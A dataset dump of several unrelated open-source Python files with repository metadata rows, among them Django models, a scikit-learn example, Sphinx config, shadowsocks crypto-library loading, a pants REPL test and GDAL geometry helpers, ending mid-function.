ArchiveFormat.write(fake, IntSequence1, IntSequenceDirectoryFormat,
lambda x: None, None)
with self.assertRaisesRegex(
ValueError, 'root directory must match UUID.*metadata'):
ArchiveFormat(r)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | -4,551,712,732,040,404,000 | 36.209677 | 79 | 0.579541 | false |
angelbot/geoincentives | geoincentives/models.py | 1 | 3064 | from django.db import models
from django.contrib.auth.models import User as DjangoUser
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import UserManager
import hashlib
class User(models.Model):
USER_TYPE = (
(1, 'student'),
(2, 'business'),
(3, 'nonprofit')
)
auth_user = models.OneToOneField(DjangoUser)
type = models.CharField(max_length=100, null=True, blank=False, choices=USER_TYPE, default=USER_TYPE[1])
company = models.CharField(max_length=255, null=True, db_index=True, blank=True)
address = models.CharField(max_length=255, null=True, db_index=True, blank=False)
city = models.CharField(max_length=255, null=True, db_index=True, blank=False)
state = models.CharField(max_length=30, null=True, db_index=True, blank=False)
zipcode = models.CharField(max_length=5, null=True, db_index=True, blank=False)
school = models.CharField(max_length=255, null=True, db_index=True, blank=False)
birthdate = models.DateField(blank=True, null=True)
points = models.IntegerField(null=True, blank=True)
def __unicode__(self):
return u'%s' % self.auth_user.email
class EventType(models.Model):
name = models.CharField(max_length=255, null=True, blank=False)
max_checkin = models.IntegerField()
def __unicode__(self):
return u'%s' % self.name
class Event(models.Model):
EVENT_STATUS = (
(1, 'active'),
(2, 'inactive')
)
name = models.CharField(max_length=255, null=True, blank=False)
type = models.ForeignKey(EventType, null=True, blank=True)
status = models.IntegerField(max_length=100, null=True, blank=False, choices=EVENT_STATUS)
start_time = models.CharField(max_length=5, null=True, blank=False)
end_time = models.CharField(max_length=5, null=True, blank=False)
date = models.DateField(null=True, blank=True)
point_value = models.IntegerField()
recurring = models.BooleanField()
verified = models.BooleanField()
address = models.CharField(max_length=255, null=True, db_index=True, blank=False)
city = models.CharField(max_length=255, null=True, db_index=True, blank=False)
state = models.CharField(max_length=30, null=True, db_index=True, blank=False)
zipcode = models.CharField(max_length=5, null=True, db_index=True, blank=False)
latitude = models.FloatField(null=True, blank=True)
longitude = models.FloatField(null=True, blank=True)
def __unicode__(self):
return u'%s' % self.name
class UserEvent(models.Model):
user = models.ForeignKey(DjangoUser, null=True, blank=True)
event = models.ForeignKey(Event, null=True, blank=True)
date = models.DateField()
def __unicode__(self):
return u'%s %s' % (self.user.username, self.event.name)
class Reward(models.Model):
name = models.CharField(max_length=255, null=True, blank=False)
available = models.IntegerField()
points = models.IntegerField()
def __unicode__(self):
return u'%s' % (self.name)
| gpl-2.0 | 2,096,577,816,930,010,000 | 39.315789 | 108 | 0.685705 | false |
zhenv5/scikit-learn | examples/feature_selection/plot_feature_selection.py | 249 | 2827 | """
===============================
Univariate Feature Selection
===============================
An example showing univariate feature selection.
Noisy (non informative) features are added to the iris data and
univariate feature selection is applied. For each feature, we plot the
p-values for the univariate feature selection and the corresponding
weights of an SVM. We can see that univariate feature selection
selects the informative features and that these have larger SVM weights.
In the total set of features, only the 4 first ones are significant. We
can see that they have the highest score with univariate feature
selection. The SVM assigns a large weight to one of these features, but also
Selects many of the non-informative features.
Applying univariate feature selection before the SVM
increases the SVM weight attributed to the significant features, and will
thus improve classification.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets, svm
from sklearn.feature_selection import SelectPercentile, f_classif
###############################################################################
# import some data to play with
# The iris dataset
iris = datasets.load_iris()
# Some noisy data not correlated
E = np.random.uniform(0, 0.1, size=(len(iris.data), 20))
# Add the noisy data to the informative features
X = np.hstack((iris.data, E))
y = iris.target
###############################################################################
plt.figure(1)
plt.clf()
X_indices = np.arange(X.shape[-1])
###############################################################################
# Univariate feature selection with F-test for feature scoring
# We use the default selection function: the 10% most significant features
selector = SelectPercentile(f_classif, percentile=10)
selector.fit(X, y)
scores = -np.log10(selector.pvalues_)
scores /= scores.max()
plt.bar(X_indices - .45, scores, width=.2,
label=r'Univariate score ($-Log(p_{value})$)', color='g')
###############################################################################
# Compare to the weights of an SVM
clf = svm.SVC(kernel='linear')
clf.fit(X, y)
svm_weights = (clf.coef_ ** 2).sum(axis=0)
svm_weights /= svm_weights.max()
plt.bar(X_indices - .25, svm_weights, width=.2, label='SVM weight', color='r')
clf_selected = svm.SVC(kernel='linear')
clf_selected.fit(selector.transform(X), y)
svm_weights_selected = (clf_selected.coef_ ** 2).sum(axis=0)
svm_weights_selected /= svm_weights_selected.max()
plt.bar(X_indices[selector.get_support()] - .05, svm_weights_selected,
width=.2, label='SVM weights after selection', color='b')
plt.title("Comparing feature selection")
plt.xlabel('Feature number')
plt.yticks(())
plt.axis('tight')
plt.legend(loc='upper right')
plt.show()
| bsd-3-clause | 2,629,065,323,852,358,000 | 32.654762 | 79 | 0.645561 | false |
unnikrishnankgs/va | venv/lib/python3.5/site-packages/tensorflow/contrib/keras/api/keras/applications/xception/__init__.py | 57 | 1148 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Xception Keras application."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.keras.python.keras.applications.xception import decode_predictions
from tensorflow.contrib.keras.python.keras.applications.xception import preprocess_input
from tensorflow.contrib.keras.python.keras.applications.xception import Xception
del absolute_import
del division
del print_function
| bsd-2-clause | 8,161,418,690,972,873,000 | 41.518519 | 90 | 0.736934 | false |
kezabelle/django-sniplates | docs/conf.py | 4 | 8236 | # -*- coding: utf-8 -*-
#
# Django Sniplates documentation build configuration file, created by
# sphinx-quickstart on Sat Sep 6 10:23:25 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django Sniplates'
copyright = u'2014, Curtis Maloney'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.3'
# The full version, including alpha/beta/rc tags.
release = '0.3.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoSniplatesdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'DjangoSniplates.tex', u'Django Sniplates Documentation',
u'Curtis Maloney', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'djangosniplates', u'Django Sniplates Documentation',
[u'Curtis Maloney'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'DjangoSniplates', u'Django Sniplates Documentation',
u'Curtis Maloney', 'DjangoSniplates', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mit | 4,453,535,118,152,873,000 | 30.922481 | 79 | 0.709811 | false |
damianam/easybuild-framework | easybuild/toolchains/linalg/atlas.py | 3 | 1662 | ##
# Copyright 2012-2017 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
Support for ATLAS as toolchain linear algebra library.
:author: Stijn De Weirdt (Ghent University)
:author: Kenneth Hoste (Ghent University)
"""
from easybuild.tools.toolchain.linalg import LinAlg
TC_CONSTANT_ATLAS = 'ATLAS'
class Atlas(LinAlg):
"""
Provides ATLAS BLAS/LAPACK support.
LAPACK is a build dependency only
"""
BLAS_MODULE_NAME = ['ATLAS']
BLAS_LIB = ["cblas", "f77blas", "atlas"]
BLAS_LIB_MT = ["ptcblas", "ptf77blas", "atlas"]
BLAS_FAMILY = TC_CONSTANT_ATLAS
LAPACK_MODULE_NAME = ['ATLAS']
LAPACK_LIB = ['lapack']
LAPACK_FAMILY = TC_CONSTANT_ATLAS
| gpl-2.0 | 147,937,814,262,639,360 | 32.24 | 96 | 0.719615 | false |
sunze/py_flask | venv/lib/python3.4/site-packages/pip/req/req_requirement.py | 118 | 1245 | from pip._vendor.packaging.version import parse as parse_version
class InstallationCandidate(object):
def __init__(self, project, version, location):
self.project = project
self.version = parse_version(version)
self.location = location
self._key = (self.project, self.version, self.location)
def __repr__(self):
return "<InstallationCandidate({0!r}, {1!r}, {2!r})>".format(
self.project, self.version, self.location,
)
def __hash__(self):
return hash(self._key)
def __lt__(self, other):
return self._compare(other, lambda s, o: s < o)
def __le__(self, other):
return self._compare(other, lambda s, o: s <= o)
def __eq__(self, other):
return self._compare(other, lambda s, o: s == o)
def __ge__(self, other):
return self._compare(other, lambda s, o: s >= o)
def __gt__(self, other):
return self._compare(other, lambda s, o: s > o)
def __ne__(self, other):
return self._compare(other, lambda s, o: s != o)
def _compare(self, other, method):
if not isinstance(other, InstallationCandidate):
return NotImplemented
return method(self._key, other._key)
| mit | 2,986,139,986,441,562,600 | 27.953488 | 69 | 0.585542 | false |
rchlin/ShadowsocksFork | shadowsocks/crypto/util.py | 1032 | 4287 | #!/usr/bin/env python
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import logging
def find_library_nt(name):
# modified from ctypes.util
# ctypes.util.find_library just returns first result he found
# but we want to try them all
# because on Windows, users may have both 32bit and 64bit version installed
results = []
for directory in os.environ['PATH'].split(os.pathsep):
fname = os.path.join(directory, name)
if os.path.isfile(fname):
results.append(fname)
if fname.lower().endswith(".dll"):
continue
fname = fname + ".dll"
if os.path.isfile(fname):
results.append(fname)
return results
def find_library(possible_lib_names, search_symbol, library_name):
import ctypes.util
from ctypes import CDLL
paths = []
if type(possible_lib_names) not in (list, tuple):
possible_lib_names = [possible_lib_names]
lib_names = []
for lib_name in possible_lib_names:
lib_names.append(lib_name)
lib_names.append('lib' + lib_name)
for name in lib_names:
if os.name == "nt":
paths.extend(find_library_nt(name))
else:
path = ctypes.util.find_library(name)
if path:
paths.append(path)
if not paths:
# We may get here when find_library fails because, for example,
# the user does not have sufficient privileges to access those
# tools underlying find_library on linux.
import glob
for name in lib_names:
patterns = [
'/usr/local/lib*/lib%s.*' % name,
'/usr/lib*/lib%s.*' % name,
'lib%s.*' % name,
'%s.dll' % name]
for pat in patterns:
files = glob.glob(pat)
if files:
paths.extend(files)
for path in paths:
try:
lib = CDLL(path)
if hasattr(lib, search_symbol):
logging.info('loading %s from %s', library_name, path)
return lib
else:
logging.warn('can\'t find symbol %s in %s', search_symbol,
path)
except Exception:
pass
return None
def run_cipher(cipher, decipher):
from os import urandom
import random
import time
BLOCK_SIZE = 16384
rounds = 1 * 1024
plain = urandom(BLOCK_SIZE * rounds)
results = []
pos = 0
print('test start')
start = time.time()
while pos < len(plain):
l = random.randint(100, 32768)
c = cipher.update(plain[pos:pos + l])
results.append(c)
pos += l
pos = 0
c = b''.join(results)
results = []
while pos < len(plain):
l = random.randint(100, 32768)
results.append(decipher.update(c[pos:pos + l]))
pos += l
end = time.time()
print('speed: %d bytes/s' % (BLOCK_SIZE * rounds / (end - start)))
assert b''.join(results) == plain
def test_find_library():
assert find_library('c', 'strcpy', 'libc') is not None
assert find_library(['c'], 'strcpy', 'libc') is not None
assert find_library(('c',), 'strcpy', 'libc') is not None
assert find_library(('crypto', 'eay32'), 'EVP_CipherUpdate',
'libcrypto') is not None
assert find_library('notexist', 'strcpy', 'libnotexist') is None
assert find_library('c', 'symbol_not_exist', 'c') is None
assert find_library(('notexist', 'c', 'crypto', 'eay32'),
'EVP_CipherUpdate', 'libc') is not None
if __name__ == '__main__':
test_find_library()
| apache-2.0 | 4,535,419,741,656,012,000 | 30.065217 | 79 | 0.585724 | false |
kslundberg/pants | tests/python/pants_test/backend/python/tasks/test_python_repl.py | 2 | 6547 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
import sys
from contextlib import contextmanager
from textwrap import dedent
from pants.backend.core.tasks.repl_task_mixin import ReplTaskMixin
from pants.backend.python.targets.python_binary import PythonBinary
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.backend.python.tasks.python_repl import PythonRepl
from pants.base.address import Address
from pants.base.build_file_aliases import BuildFileAliases
from pants.base.exceptions import TaskError
from pants.base.source_root import SourceRoot
from pants.base.target import Target
from pants.util.contextutil import temporary_dir
from pants_test.backend.python.tasks.python_task_test_base import PythonTaskTestBase
class PythonReplTest(PythonTaskTestBase):
@classmethod
def task_type(cls):
return PythonRepl
class JvmTarget(Target):
pass
@property
def alias_groups(self):
return super(PythonReplTest, self).alias_groups.merge(
BuildFileAliases(targets={'jvm_target': self.JvmTarget}))
def create_non_python_target(self, relpath, name):
self.create_file(relpath=self.build_path(relpath), contents=dedent("""
jvm_target(
name='{name}',
)
""").format(name=name))
return self.target(Address(relpath, name).spec)
def setUp(self):
super(PythonReplTest, self).setUp()
SourceRoot.register('3rdparty', PythonRequirementLibrary)
SourceRoot.register('src', PythonBinary, PythonLibrary)
self.six = self.create_python_requirement_library('3rdparty/six', 'six',
requirements=['six==1.9.0'])
self.requests = self.create_python_requirement_library('3rdparty/requests', 'requests',
requirements=['requests==2.6.0'])
self.library = self.create_python_library('src/lib', 'lib', {'lib.py': dedent("""
import six
def go():
six.print_('go', 'go', 'go!', sep='')
""")}, dependencies=['//3rdparty/six'])
self.binary = self.create_python_binary('src/bin', 'bin', 'lib.go', dependencies=['//src/lib'])
self.non_python_target = self.create_non_python_target('src/java', 'java')
def tearDown(self):
super(PythonReplTest, self).tearDown()
SourceRoot.reset()
ReplTaskMixin.reset_implementations()
@contextmanager
def new_io(self, input):
orig_stdin, orig_stdout, orig_stderr = sys.stdin, sys.stdout, sys.stderr
with temporary_dir() as iodir:
stdin = os.path.join(iodir, 'stdin')
stdout = os.path.join(iodir, 'stdout')
stderr = os.path.join(iodir, 'stderr')
with open(stdin, 'w') as fp:
fp.write(input)
with open(stdin, 'rb') as inp, open(stdout, 'wb') as out, open(stderr, 'wb') as err:
sys.stdin, sys.stdout, sys.stderr = inp, out, err
try:
yield inp, out, err
finally:
sys.stdin, sys.stdout, sys.stderr = orig_stdin, orig_stdout, orig_stderr
def do_test_repl(self, code, expected, targets, options=None):
if options:
self.set_options(**options)
class JvmRepl(ReplTaskMixin):
options_scope = 'test_scope_jvm_repl'
@classmethod
def select_targets(cls, target):
return isinstance(target, self.JvmTarget)
def setup_repl_session(_, targets):
raise AssertionError()
def launch_repl(_, session_setup):
raise AssertionError()
# Add a competing REPL impl.
JvmRepl.prepare(self.options, round_manager=None)
python_repl = self.create_task(self.context(target_roots=targets))
original_launcher = python_repl.launch_repl
with self.new_io('\n'.join(code)) as (inp, out, err):
def custom_io_patched_launcher(pex):
return original_launcher(pex, stdin=inp, stdout=out, stderr=err)
python_repl.launch_repl = custom_io_patched_launcher
python_repl.execute()
with open(out.name) as fp:
lines = fp.read()
if not expected:
self.assertEqual('', lines)
else:
for expectation in expected:
self.assertIn(expectation, lines)
def do_test_library(self, *targets):
self.do_test_repl(code=['from lib.lib import go',
'go()'],
expected=['gogogo!'],
targets=targets)
def test_library(self):
self.do_test_library(self.library)
def test_binary(self):
self.do_test_library(self.binary)
def test_requirement(self):
self.do_test_repl(code=['import six',
'print("python 2?:{}".format(six.PY2))'],
expected=['python 2?:True'],
targets=[self.six])
def test_mixed_python(self):
self.do_test_repl(code=['import requests',
'import six',
'from lib.lib import go',
'print("teapot response code is: {}".format(requests.codes.teapot))',
'go()',
'print("python 2?:{}".format(six.PY2))'],
expected=['teapot response code is: 418',
'gogogo!',
'python 2?:True'],
targets=[self.requests, self.binary])
def test_disallowed_mix(self):
with self.assertRaises(TaskError):
self.do_test_repl(code=['print("unreachable")'],
expected=[],
targets=[self.library, self.non_python_target])
def test_non_python_targets(self):
self.do_test_repl(code=['import java.lang.unreachable'],
expected=[''],
targets=[self.non_python_target])
def test_ipython(self):
# IPython supports shelling out with a leading !, so indirectly test its presence by reading
# the head of this very file.
with open(__file__) as fp:
me = fp.readline()
self.do_test_repl(code=['!head -1 {}'.format(__file__)],
expected=[me],
targets=[self.six], # Just to get the repl to pop up.
options={'ipython': True})
| apache-2.0 | -562,845,480,984,442,700 | 35.780899 | 99 | 0.615396 | false |
Castronova/EMIT | utilities/geometry.py | 1 | 9692 | __author__ = 'tonycastronova'
import numpy
from osgeo import ogr
import stdlib
from emitLogging import elog
def fromWKB(wkb):
"""
Builds a stdlib.Geometry object from a WKB string
:param wkb: wkb string
:return: stdlib.Geometry
"""
geom = None
# parse the wkt string into ogr
ogrgeom = ogr.CreateGeometryFromWkb(wkb)
# get geometry type
geomtype = ogrgeom.GetGeometryName()
if geomtype == stdlib.GeomType.POINT:
geom = fromGdalPoint(ogrgeom)
elif geomtype == stdlib.GeomType.LINESTRING:
geom = fromGdalLinestring(ogrgeom)
elif geomtype == stdlib.GeomType.POLYGON:
geom = fromGdalPolygon(ogrgeom)
else:
elog.critical("Unsupported geometry type %s, in utilities.geometry.fromWKB" % geomtype)
return geom[0]
def fromWKT(wkt):
"""
Builds a stdlib.Geometry object from a WKT string
:param wkt: wkt string
:return: stdlib.Geometry
"""
geom = None
# parse the wkt string into ogr
ogrgeom = ogr.CreateGeometryFromWkt(wkt)
# get geometry type
geomtype = ogrgeom.GetGeometryName()
if geomtype == stdlib.GeomType.POINT:
geom = fromGdalPoint(ogrgeom)
elif geomtype == stdlib.GeomType.LINESTRING:
geom = fromGdalLinestring(ogrgeom)
elif geomtype == stdlib.GeomType.POLYGON:
geom = fromGdalPolygon(ogrgeom)
elif geomtype == stdlib.GeomType.MULTILINESTRING:
geom = fromGdalMultiLinestring(ogrgeom)
elif geomtype == stdlib.GeomType.MULTIPOINT:
geom = fromGdalMultiPoint(ogrgeom)
elif geomtype == stdlib.GeomType.MULTIPOLYGON:
geom = fromGdalMultiPolygon(ogrgeom)
else:
elog.critical("Unsupported geometry type %s, in utilities.geometry.fromWKT" % geomtype)
return geom
def fromGdalPolygon(gdalpolygon):
"""
Builds a stdlib.Geometry object from a GDAL polygon
:param gdalpolygon: osgeo.gdal.Polygon
:return: numpy.array(stdlib.Geometry)
"""
# get the ring that defines the polygon
ring = gdalpolygon.GetGeometryRef(0)
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbPolygon)
# add the ring
g.AddGeometry(ring)
# return the geometry
return numpy.array([g])
def fromGdalPoint(gdalpoint):
"""
Builds a stdlib.Geometry object from a GDAL point
:param gdalpolygon: osgeo.gdal.Point
:return: stdlib.Geometry
"""
# get the geoms point
pt = gdalpoint.GetPoint()
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbPoint)
# add the point
g.AddPoint(*pt)
# return the geometry
return numpy.array([g])
def fromGdalLinestring(gdallinestring):
"""
Builds a stdlib.Geometry object from a GDAL linstring
:param gdalpolygon: osgeo.gdal.LineString
:return: stdlib.Geometry
"""
# get the points of the linestring
pts = gdallinestring.GetPoints()
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbLineString)
# add points to the linestring
for pt in pts:
g.AddPoint(*pt)
# return the geometry
return numpy.array([g])
def fromGdalMultiLinestring(gdallinestring):
"""
Builds a stdlib.Geometry object from a GDAL linstring
:param gdalpolygon: osgeo.gdal.LineString
:return: stdlib.Geometry
"""
geom_count = gdallinestring.GetGeometryCount()
geometry_array = []
for i in range(0, geom_count):
geom = gdallinestring.GetGeometryRef(i)
# get the points of the linestring
pts = geom.GetPoints()
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbLineString)
# add points to the linestring
for pt in pts:
g.AddPoint(*pt)
geometry_array.append(g)
# return the geometry
return numpy.array(geometry_array)
def fromGdalMultiPoint(gdalmultipoint):
"""
Builds a stdlib.Geometry object from a GDAL multipoint
:param gdalmultipoint: osgeo.gdal.MultiPoint
:return: numpy.array(stdlib.Geometry)
"""
geom_count = gdalmultipoint.GetGeometryCount()
geometry_array = []
for i in range(0, geom_count):
geom = gdalmultipoint.GetGeometryRef(i)
# get the points of the linestring
pt = geom.GetPoint()
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbPoint)
# add point to geometry
g.AddPoint(*pt)
geometry_array.append(g)
# return the geometry
return numpy.array(geometry_array)
def fromGdalMultiPolygon(gdalmultipolygon):
"""
Builds a stdlib.Geometry object from a GDAL multipolygon
:param gdalmultipolygon: osgeo.gdal.MultiPolygon
:return: numpy.array(stdlib.Geometry)
"""
geom_count = gdalmultipolygon.GetGeometryCount()
geometry_array = []
for i in range(0, geom_count):
polygon = gdalmultipolygon.GetGeometryRef(i)
# create the stdlib geometry
g = stdlib.Geometry2(ogr.wkbPolygon)
ring_count = polygon.GetGeometryCount()
for j in range(0, ring_count):
# get the ring for this geometry
ring = polygon.GetGeometryRef(j)
# add ring to geometry
g.AddGeometry(ring)
# save the polygon geometry in numpy array
geometry_array.append(g)
# return the geometry
return numpy.array(geometry_array)
def build_point_geometry(x, y, z=0):
"""
Builds stdlib point Geometry object
:param x: single value (float)
:param y: single value (float)
:return: stdlib point geometru
"""
# create an empty point
point = stdlib.Geometry2(ogr.wkbPoint)
try:
# add the x, y, z coordinates
point.AddPoint(float(x), float(y), float(z))
except Exception, e:
print e
return point
def build_point_geometries(x, y):
"""
Builds stdlib Geometry objects from a list of x and y coordinates
:param x: single value, list, or numpy array of x coordinates
:param y: single value, list, or numpy array of y coordinates
:return: numpy array of stdlib geometries
"""
# try to convert x,y coordinates into numpy arrays
if type(x) != type(y):
elog.critical('Could not convert the x,y coordinates into numpy array objects: X and Y types do not match')
return None
try:
if not isinstance(x, numpy.ndarray) and not isinstance(y, numpy.ndarray):
if (isinstance(x, list) or isinstance(x, tuple) ) and ( isinstance(y, list) or isinstance(y, tuple) ):
x = numpy.asarray(x)
y = numpy.asarray(y)
else:
x = numpy.array([x])
y = numpy.array([y])
except:
elog.critical('Could not convert the x,y coordinates into numpy array objects!')
return None
geoms = numpy.empty((x.shape[0]), dtype=object)
for i in range(len(x)):
point = stdlib.Geometry2(ogr.wkbPoint)
# point = ogr.Geometry(ogr.wkbPoint)
point.AddPoint(float(x[i]), float(y[i]))
geoms[i] = point
return geoms
def build_polygon_geometries(coords):
"""
Builds stdlib Geometry objects from coordinates
:param coords: list or numpy array of polygons coordinates [[[1,2],[2,3], ], ]
:return: numpy array of stdlib geometries
"""
# try to convert x,y coordinates into numpy arrays
try:
if not isinstance(coords, numpy.ndarray):
if isinstance(coords, list):
coords = numpy.asarray(coords)
else:
coords = numpy.array([coords])
except:
elog.critical('Could not convert the x,y coordinates into numpy array objects!')
return None
shape = coords.shape
poly_count = shape[0] if len(shape) == 3 else 1
has_multiple = 1 if len(shape) > 2 else 0
geoms = numpy.empty((poly_count), dtype=object)
if has_multiple:
for i in xrange(0, len(coords)):
ring = ogr.Geometry(ogr.wkbLinearRing)
for pt in coords[i]:
ring.AddPoint(float(pt[0]), float(pt[1]))
poly = stdlib.Geometry2(ogr.wkbPolygon)
poly.AddGeometry(ring)
geoms[i] = poly
else:
ring = ogr.Geometry(ogr.wkbLinearRing)
for pt in coords:
ring.AddPoint(float(pt[0]), float(pt[1]))
poly = stdlib.Geometry2(ogr.wkbPolygon)
poly.AddGeometry(ring)
geoms[0] = poly
return geoms
def build_polyline_geometries(coords):
"""
Builds stdlib Geometry objects from coordinates
:param coords: list or numpy array of polyline coordinates [[[1,2],[2,3], ], ]
:return: numpy array of stdlib geometries
"""
# try to convert x,y coordinates into numpy arrays
try:
if not isinstance(coords, numpy.ndarray):
if isinstance(coords, list):
coords = numpy.asarray(coords)
else:
coords = numpy.array([coords])
except:
elog.critical('Could not convert the x,y coordinates into numpy array objects!')
return None
shape = coords.shape
